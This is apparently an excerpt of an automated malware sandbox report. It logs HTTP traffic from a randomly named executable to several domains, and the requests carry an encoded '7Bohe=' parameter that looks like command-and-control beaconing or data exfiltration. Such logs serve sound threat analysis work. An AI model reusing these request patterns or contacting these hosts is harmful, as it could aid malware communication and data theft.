                                                                                                                                                                                                                                              Referer: http://www.putizhong.homes/oacu/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 64 77 32 6c 54 4a 4e 43 48 68 69 6c 4b 49 61 2b 5a 61 68 6d 33 70 65 73 78 71 59 66 75 73 65 67 69 78 58 70 36 49 41 75 4e 61 4b 37 74 70 70 6f 54 39 61 6f 48 79 48 72 48 50 53 45 51 56 45 59 6b 46 2f 57 71 45 2f 59 6a 5a 74 31 4f 5a 67 47 4e 57 4a 50 77 65 69 6a 4d 4c 47 69 6c 35 37 43 32 59 75 59 79 78 70 62 51 66 6b 33 44 79 6f 49 46 4c 37 6c 56 38 73 48 46 5a 6b 2b 34 43 4d 5a 70 42 36 47 6f 77 6e 45 36 65 6d 47 4b 45 38 72 66 31 5a 50 67 47 30 56 6a 4a 41 54 37 58 58 49 68 39 41 6f 31 55 68 44 45 58 39 38 30 75 6f 6f 73 77 4e 74 57 2f 62 65 46 52 77 64 5a 51 71 4c 52 6d 46 2f 69 57 70 62 45 2f 59 68 2f 41 79 59 38 57 6a 65 72 31 66 50 50 5a 6e 54 35 57 34 70 45 45 6c 6c 47 52 30 4f 31 7a 56 2b 79 49 6f 35 66 76 49 67 53 59 4a 37 74 50 57 6f 43 34 54 51 68 42 48 4c 70 6b 77 73 4b 58 51 43 49 49 6e 45 67 73 7a 6b 67 41 65 49 33 75 4e 4d 59 30 33 66 2f 69 37 4a 48 4f 56 33 47 42 50 32 74 72 68 76 4a 75 4f 55 4b 75 6f 66 51 6c 48 41 48 33 4a 72 61 44 67 6d 69 75 31 41 35 6a 56 45 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=dw2lTJNCHhilKIa+Zahm3pesxqYfusegixXp6IAuNaK7tppoT9aoHyHrHPSEQVEYkF/WqE/YjZt1OZgGNWJPweijMLGil57C2YuYyxpbQfk3DyoIFL7lV8sHFZk+4CMZpB6GownE6emGKE8rf1ZPgG0VjJAT7XXIh9Ao1UhDEX980uooswNtW/beFRwdZQqLRmF/iWpbE/Yh/AyY8Wjer1fPPZnT5W4pEEllGR0O1zV+yIo5fvIgSYJ7tPWoC4TQhBHLpkwsKXQCIInEgszkgAeI3uNMY03f/i7JHOV3GBP2trhvJuOUKuofQlHAH3JraDgmiu1A5jVElhYNSl1UaNcF9ht+4QwKqqK7sFocufVE/hzK1peMBPdGOqELc/WxyOyvUMXdN3QXx2WbeefWbyXICQnNYPCIEhgcgn9JEMuIXe9kct+/cvZ8+hHJyQ96Q2gollf2FmfyfYTZU9vA39EmZGlYASidzMcHF1kWbob3l0VFZ5WPz5HF3WZlHIU6h41wz/lwDfaLALXQO95TyIFxsksqmgTVdO2Wns7sYIQZDOtTMV893B/ZzglGWpGARajI95AHRoH1QdqbT41A559LSX/cLMsaZqBzkhmjB0cDt1C9qL56Ni/Lq2Uaupq//+63eaIZ9JRupFtB6KusZDrIPVyV/fUS1XIYDN7ZIapWqz0NZzcwFFT+O2bRP9IJ9JCwkBKZ0rHyUZ+vrxbxuMLBGLR8aQqnxYsu4nc8nWjYnBJ+UzWlq0FjorT/2I3Zjy+O0IlHgtlnG11NqtM4WrL5bFrwd8F0tgWhcsyQPxbpUlVJt9CLTl1oYuEgSSEESx7CmFZr+RyQ85+rTWJDd3wEvaWyDmUeWoqE12EUH80jqn3q16W3M4+bERTZ9vpnz2UuG3AT35t5yNkJY3C7AMug19g4Lh9+Tr6cLNvTD9EweuzdyQwyy2sIuMvliJFAvc61Y7oA4zGKZ7zeX4T5nHQw2phoavneIjXbSXK1xQejKv [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:09.268960953 CEST685INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              8192.168.2.549988154.7.176.67802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.178035975 CEST485OUTGET /oacu/?vD=h0e85v&7Bohe=QyeFQ+FiMQKSKdq/BKxG+5Ov1bwmlN3FnlPZyKM2ZYbXsZFvV/O3NTv6ZfeubWU6jSKaxDXQpId5DKUlUVN54eSFHJCOrp//l7em+zpeeu1iGig/Io/KcJQlUpo44DFlsQ== HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.826174021 CEST685INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              9192.168.2.549991118.139.178.37802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.916616917 CEST740OUTPOST /o55g/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.coba168.info
                                                                                                                                                                                                                                              Origin: http://www.coba168.info
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.coba168.info/o55g/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 66 6c 46 67 62 58 61 5a 52 76 78 39 58 52 76 33 59 77 57 36 68 73 69 6a 36 75 2f 41 54 4b 50 38 4f 33 58 58 62 55 7a 6e 4c 54 2f 2b 61 67 51 35 4a 45 38 74 51 62 76 32 6e 72 36 68 42 64 4d 76 47 74 6c 61 69 6c 4b 36 66 6c 33 37 45 31 44 68 37 6c 33 72 77 72 6e 65 6c 37 32 53 4f 76 61 50 4f 69 62 4c 4c 53 78 6a 72 54 6f 66 4f 66 54 34 42 30 78 43 36 74 4f 44 59 59 79 4f 44 65 74 62 75 30 6f 6d 32 46 4c 68 2b 73 74 6c 74 69 74 32 55 64 62 2f 43 30 4f 68 58 4d 4a 63 39 72 2f 35 78 66 66 48 37 45 2b 47 79 73 71 49 79 6e 4f 68 78 63 4b 31 6a 66 4d 35 36 38 6f 30 6b 31 31 61 56 71 33 38 4b 36 67 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=flFgbXaZRvx9XRv3YwW6hsij6u/ATKP8O3XXbUznLT/+agQ5JE8tQbv2nr6hBdMvGtlailK6fl37E1Dh7l3rwrnel72SOvaPOibLLSxjrTofOfT4B0xC6tODYYyODetbu0om2FLh+stltit2Udb/C0OhXMJc9r/5xffH7E+GysqIynOhxcK1jfM568o0k11aVq38K6g=
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102643967 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:17 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.23
                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                              Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.coba168.info/xmlrpc.php" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.7 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - coba168 </title><meta property="og:locale" content="th_TH" /><meta property="og:title" content="Page not found - coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102709055 CEST212INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                                                                                                                                                                                              Data Ascii: " /><meta property="og:site_name" content="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102727890 CEST1236INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70
                                                                                                                                                                                                                                              Data Ascii: " /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.coba168.info/#website","url":"https
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102762938 CEST212INData Raw: 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20
                                                                                                                                                                                                                                              Data Ascii: {"@id":"https://www.coba168.info/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel="alternate" type="application/rss+xml" title="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102777004 CEST1236INData Raw: 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0
                                                                                                                                                                                                                                              Data Ascii: &raquo; " href="https://www.coba168.info/feed/" /><link rel="alternate" type="application/rss+xml" title="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102803946 CEST1236INData Raw: 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65
                                                                                                                                                                                                                                              Data Ascii: ageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102834940 CEST424INData Raw: 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66
                                                                                                                                                                                                                                              Data Ascii: ar e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=type
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102890968 CEST1236INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29
                                                                                                                                                                                                                                              Data Ascii: .toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102988005 CEST1236INData Raw: 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72
                                                                                                                                                                                                                                              Data Ascii: 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.coba168.info/wp-includes/css/dist/block-library/styl
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.103005886 CEST424INData Raw: 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61
                                                                                                                                                                                                                                              Data Ascii: -wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gr
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108412981 CEST1236INData Raw: 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f
                                                                                                                                                                                                                                              Data Ascii: ent(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-viv


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              10192.168.2.549992118.139.178.37802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:19.466129065 CEST760OUTPOST /o55g/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.coba168.info
                                                                                                                                                                                                                                              Origin: http://www.coba168.info
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.coba168.info/o55g/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 66 6c 46 67 62 58 61 5a 52 76 78 39 56 77 2f 33 55 33 71 36 70 73 69 6b 31 4f 2f 41 59 71 4f 55 4f 77 66 58 62 52 44 33 4c 68 62 2b 62 42 67 35 49 46 38 74 54 62 76 32 6f 4c 36 67 4d 39 4d 6b 47 74 6f 6c 69 6c 47 36 66 6c 6a 37 45 33 62 68 37 79 6a 6f 79 37 6e 4c 70 62 32 51 51 66 61 50 4f 69 62 4c 4c 53 6c 46 72 54 67 66 4f 73 4c 34 42 56 78 46 6b 64 4f 41 49 49 79 4f 56 75 74 41 75 30 70 46 32 48 2b 45 2b 70 70 6c 74 6e 52 32 55 6f 6e 2b 4d 30 4f 6e 4b 63 49 79 30 65 53 77 70 4a 71 4d 34 46 50 41 6e 66 53 64 2b 78 6a 4c 72 2b 43 64 77 2f 67 42 71 76 67 44 31 46 55 7a 50 4a 6e 4d 55 74 30 58 79 35 78 66 39 2f 63 34 64 77 36 6c 76 55 77 51 7a 4c 50 56
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=flFgbXaZRvx9Vw/3U3q6psik1O/AYqOUOwfXbRD3Lhb+bBg5IF8tTbv2oL6gM9MkGtolilG6flj7E3bh7yjoy7nLpb2QQfaPOibLLSlFrTgfOsL4BVxFkdOAIIyOVutAu0pF2H+E+ppltnR2Uon+M0OnKcIy0eSwpJqM4FPAnfSd+xjLr+Cdw/gBqvgD1FUzPJnMUt0Xy5xf9/c4dw6lvUwQzLPV
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660245895 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:20 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.23
                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                              Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.coba168.info/xmlrpc.php" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.7 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - coba168 </title><meta property="og:locale" content="th_TH" /><meta property="og:title" content="Page not found - coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660281897 CEST212INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                                                                                                                                                                                              Data Ascii: " /><meta property="og:site_name" content="coba168
